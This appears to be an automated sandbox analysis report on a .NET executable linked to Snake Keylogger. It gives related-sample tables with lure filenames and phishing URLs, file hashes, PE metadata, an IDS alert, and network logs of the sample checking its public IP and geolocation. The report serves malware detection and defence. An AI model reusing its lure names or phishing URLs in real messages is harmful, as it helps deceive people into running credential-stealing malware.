ORACLE-BMC-31898US | Purchase Order 77809 for acknowledgment.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | Swift Copy_18.02.2025.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | Quote_items1&2.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | invoice packing list.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | customer request.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | CamScanner02-13-20251913.js | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | HUCSD23ED2025.exe | malicious | MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | AWB_5771388044 Versanddokumente.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | dhl awb2846086773 Gönderinizin CFH-150(P) .exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
CLOUDFLARENETUS | BAO SHUN Vessel Particulars.docx.scr.exe | malicious | MassLogger RAT | 104.21.112.1
CLOUDFLARENETUS | VSVy.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
CLOUDFLARENETUS | Šiauliai.dll | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | chitanta de plata 002093940409505050960000.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | http://www.asphaltprofessionals.com | malicious | CAPTCHA Scam ClickFix | 172.64.146.59
CLOUDFLARENETUS | https://github.com/divinusinc/Deus/releases/download/launcher/Deus.Launcher.exe | malicious | Unknown | 172.67.214.1
CLOUDFLARENETUS | https://rnicrosoft-secured-office.squarespace.com/sharepointcoc?e=bob_smith@gmail.com | malicious | HTMLPhisher | 104.18.95.41
CLOUDFLARENETUS | https://newtravels981.weebly.com/log-in-whatsapp.html | malicious | Unknown | 104.18.86.42
CLOUDFLARENETUS | 孟轩网1.0 64位.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | https://ashmithraj069.github.io/Amazon-Clone/ | malicious | HTMLPhisher | 104.17.24.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | BAO SHUN Vessel Particulars.docx.scr.exe | malicious | MassLogger RAT | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | VSVy.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | Purchase Order 77809 for acknowledgment.exe | malicious | Snake Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | Swift Copy_18.02.2025.exe | malicious | GuLoader, Snake Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | new purchase order21125.bat.exe | malicious | Snake Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | Quote_items1&2.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | invoice packing list.exe | malicious | Snake Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | Draft doc PI ITS15235.vbs | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | customer request.exe | malicious | Snake Keylogger | 104.21.64.1
54328bd36c14bd82ddaa0c04b25ed9ad | Türk Havacılık ve Uzay Sanayii AŞ TEKLİF TALEBİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
                                                      No context
                                                      Process:C:\Users\user\Desktop\rPO2400525.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.379460230152629
                                                      Encrypted:false
                                                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:fLHyIFKL3IZ2KRH9Ougss
                                                      MD5:47AE6B38874AA66FC6688784E5F2EF18
                                                      SHA1:AF71A58235AE5D80BDDA79DE907697354E5553F6
                                                      SHA-256:F271AAB7854518D80F39793CBA35D7BFDABBFBCAC9DBD8F5E79EAE393BDC4C98
                                                      SHA-512:D8FD735141FBF25FE4EFB88E973F4416A50EC0E065A297BC8B398FF96AD77EE852EA2E66BD3CAFED7C4C9EE9D24742C3D95F03DD13DBC6C1B57BFDB2F40EF1A3
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.641117860261824
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:rPO2400525.exe
                                                      File size:626'688 bytes
                                                      MD5:9393c3e2268fe4c15da55f0d5233245d
                                                      SHA1:ecc0ea51def475cd0facc10c5911c0546d6cd835
                                                      SHA256:8ea6427ed08636f4220611662424cdf09103fecdb4ef6a0c15103c715364fbf3
                                                      SHA512:f2a6cecd7f3757c29b7bc9c1fc824d5582d0e1ab9346c23f4b2c3a4f1163dba1dc23df8fdf17bd2078046a1f228f49926d8f61c144970cb7cc9803eb7ca8ebd9
                                                      SSDEEP:12288:3gPGbnb4cZOlRz2Gfp8LjRLJl7E9u7R5f5BL9Cb771kUKYDTPm:QAjgKGSjRtlg9sl79Q77f1e
                                                      TLSH:CBD4CED03B36731ADE695934D198DEB582B51E68B001FAF6A9DC3F97358C2129E0CF42
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Fv................0..~..........^.... ........@.. ....................................`................................
                                                      Icon Hash:9898a6a698a62688
                                                      Entrypoint:0x499c5e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x84197646 [Sun Mar 25 04:06:30 2040 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add eax, dword ptr [eax]
                                                      add byte ptr [eax], al
                                                      add al, 00h
                                                      add byte ptr [eax], al
                                                      add eax, 06000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], cl
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], cl
                                                      add byte ptr [eax], al
                                                      add byte ptr [edi], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ebx], cl
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x99c0c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9a000 | 0xd24 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x99bf0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x97d64 | 0x97e00 | e24a3bdb56c0773a69f39d1b6d0fe9ae | False | 0.850344007201646 | data | 7.650200393910615 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x9a000 | 0xd24 | 0xe00 | 6a3d2db41ff2271ed4fb9761dafd9fbf | False | 0.36746651785714285 | data | 5.6730109295035005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9c000 | 0xc | 0x200 | bb1b743871579a2729b4c7c512d90f84 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x9a0c8 | 0x8ed | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.3846827133479212
RT_GROUP_ICON | 0x9a9c8 | 0x14 | data | | | 1.05
RT_VERSION | 0x9a9ec | 0x334 | data | | | 0.4304878048780488
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | Sakk Alkalmazs 2.0
FileVersion | 1.0.0.0
InternalName | RjYY.exe
LegalCopyright | Copyright 2021
LegalTrademarks |
OriginalFilename | RjYY.exe
ProductName | Sakk Alkalmazs 2.0
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-19T04:01:19.392226+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 19, 2025 04:01:16.576821089 CET | 49706 | 80 | 192.168.2.5 | 193.122.130.0
Feb 19, 2025 04:01:16.582062960 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.5
Feb 19, 2025 04:01:16.582323074 CET | 49706 | 80 | 192.168.2.5 | 193.122.130.0
Feb 19, 2025 04:01:16.582699060 CET | 49706 | 80 | 192.168.2.5 | 193.122.130.0
Feb 19, 2025 04:01:16.587691069 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.5
Feb 19, 2025 04:01:19.232677937 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.5
Feb 19, 2025 04:01:19.238214016 CET | 49706 | 80 | 192.168.2.5 | 193.122.130.0
Feb 19, 2025 04:01:19.243350983 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.5
Feb 19, 2025 04:01:19.350572109 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.5
Feb 19, 2025 04:01:19.365951061 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:19.365993023 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:19.366092920 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:19.379524946 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:19.379539967 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:19.392225981 CET | 49706 | 80 | 192.168.2.5 | 193.122.130.0
Feb 19, 2025 04:01:19.846616030 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:19.846952915 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:19.888998032 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:19.889014006 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:19.889379025 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:19.939703941 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:20.066951990 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:20.107338905 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:20.184815884 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:20.184887886 CET | 443 | 49708 | 104.21.64.1 | 192.168.2.5
Feb 19, 2025 04:01:20.184936047 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:01:20.194380045 CET | 49708 | 443 | 192.168.2.5 | 104.21.64.1
Feb 19, 2025 04:02:24.354976892 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.5
Feb 19, 2025 04:02:24.355067968 CET | 49706 | 80 | 192.168.2.5 | 193.122.130.0
Feb 19, 2025 04:02:59.363548040 CET | 49706 | 80 | 192.168.2.5 | 193.122.130.0
Feb 19, 2025 04:02:59.368768930 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 19, 2025 04:01:16.460906982 CET | 55918 | 53 | 192.168.2.5 | 1.1.1.1
Feb 19, 2025 04:01:16.468204975 CET | 53 | 55918 | 1.1.1.1 | 192.168.2.5
Feb 19, 2025 04:01:19.353993893 CET | 59109 | 53 | 192.168.2.5 | 1.1.1.1
Feb 19, 2025 04:01:19.365143061 CET | 53 | 59109 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 19, 2025 04:01:16.460906982 CET | 192.168.2.5 | 1.1.1.1 | 0xbf60 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.353993893 CET | 192.168.2.5 | 1.1.1.1 | 0x18f2 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 19, 2025 04:01:16.468204975 CET | 1.1.1.1 | 192.168.2.5 | 0xbf60 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Feb 19, 2025 04:01:16.468204975 CET | 1.1.1.1 | 192.168.2.5 | 0xbf60 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:16.468204975 CET | 1.1.1.1 | 192.168.2.5 | 0xbf60 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:16.468204975 CET | 1.1.1.1 | 192.168.2.5 | 0xbf60 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:16.468204975 CET | 1.1.1.1 | 192.168.2.5 | 0xbf60 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:16.468204975 CET | 1.1.1.1 | 192.168.2.5 | 0xbf60 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.365143061 CET | 1.1.1.1 | 192.168.2.5 | 0x18f2 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.365143061 CET | 1.1.1.1 | 192.168.2.5 | 0x18f2 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.365143061 CET | 1.1.1.1 | 192.168.2.5 | 0x18f2 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.365143061 CET | 1.1.1.1 | 192.168.2.5 | 0x18f2 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.365143061 CET | 1.1.1.1 | 192.168.2.5 | 0x18f2 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.365143061 CET | 1.1.1.1 | 192.168.2.5 | 0x18f2 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Feb 19, 2025 04:01:19.365143061 CET | 1.1.1.1 | 192.168.2.5 | 0x18f2 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
                                                      • reallyfreegeoip.org
                                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | 2380 | C:\Users\user\Desktop\rPO2400525.exe
Timestamp | Bytes transferred | Direction | Data
Feb 19, 2025 04:01:16.582699060 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
Feb 19, 2025 04:01:19.232677937 CET | 321 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 19 Feb 2025 03:01:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 104
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: af306719f6221e4bc615bd261ccad5af
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 19, 2025 04:01:19.238214016 CET | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
Feb 19, 2025 04:01:19.350572109 CET | 321 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 19 Feb 2025 03:01:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 104
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 59bded412b60bfd4627ad9877f4c7ffc
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 104.21.64.1 | 443 | 2380 | C:\Users\user\Desktop\rPO2400525.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-19 03:01:20 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
2025-02-19 03:01:20 UTC | 856 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 19 Feb 2025 03:01:20 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 362
                                                      Connection: close
                                                      Age: 165848
                                                      Cache-Control: max-age=31536000
                                                      cf-cache-status: HIT
                                                      last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFcxOc%2F5e1ezrFHNw5fuRtvyd7oXe90P1SK5Cgm60pLtZLz39sQvxXhSJwi0Gy7r0%2FjzLLAZmZYmGLGg6XtoLJmsBaf%2B6A6J3tcg3uhHor1KS5Tqorw7l5DQX%2FafH5Ndhds42oAo"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 91430300ba19c358-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1679&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1646926&cwnd=155&unsent_bytes=0&cid=4fe165ca23b5aebf&ts=352&x=0"
                                                      2025-02-19 03:01:20 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
